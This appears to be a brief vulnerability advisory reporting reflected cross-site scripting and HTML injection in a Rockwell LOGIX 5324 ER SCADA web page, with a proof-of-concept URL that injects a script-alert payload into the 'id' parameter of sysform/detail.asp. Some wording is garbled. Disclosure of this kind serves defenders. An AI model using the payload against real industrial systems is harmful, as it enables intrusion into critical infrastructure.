Rockwell LOGIX 5324 ER suffers from cross site scripting and html injection vulnerabilities.
ea5b7abf9d32d9e47f4676930d6def4b Vulnerable Product(s): Rockwell SCADA/ICS System
Affected Version(s): Rockwell LOGIX 5324 ER
Vulnerability Typus: Cross Site Scripting & HTML Adegnjection
Description:
SCADA systems are crucial for industrial organizations since they help to
maintain efficiency, process data for smarter decisions, and communicate
system issues to help mitigate downtime.
The basic SCADA architecture begins with programmable logic controllers
(PLCs) or remote terminal units (RTUs). PLCs and RTUs are microcomputers
that communicate with an array of objects such as factory machines, HMIs,
sensors, and end devices, and then route the information from those objects
to computers with SCADA software. The SCADA software processes,
distributes, and displays the data, helping operators and other employees
analyze the data and make important decisions.
Technical Details:
1. Start the application
2. Go to ipadress.com/ sysform/detail.asp?id=<script>alert(1);</script>
3. oopss. XSS detected
4. Go to sysform/detail.asp?id=html code
5. oppss html injection detected
PoC or Exploitcode:
ipadress/sysform/detail.asp?id=<script>alert(1);</script>
ipadress/sysform/detail.asp?id=html code
Author/Group: Adegsmail BALBAL & Sezai Ali HOROZOALU
Vendor-URL: https://www.rockwellautomation.com/
Product-URL: https://www.rockwellautomation.com/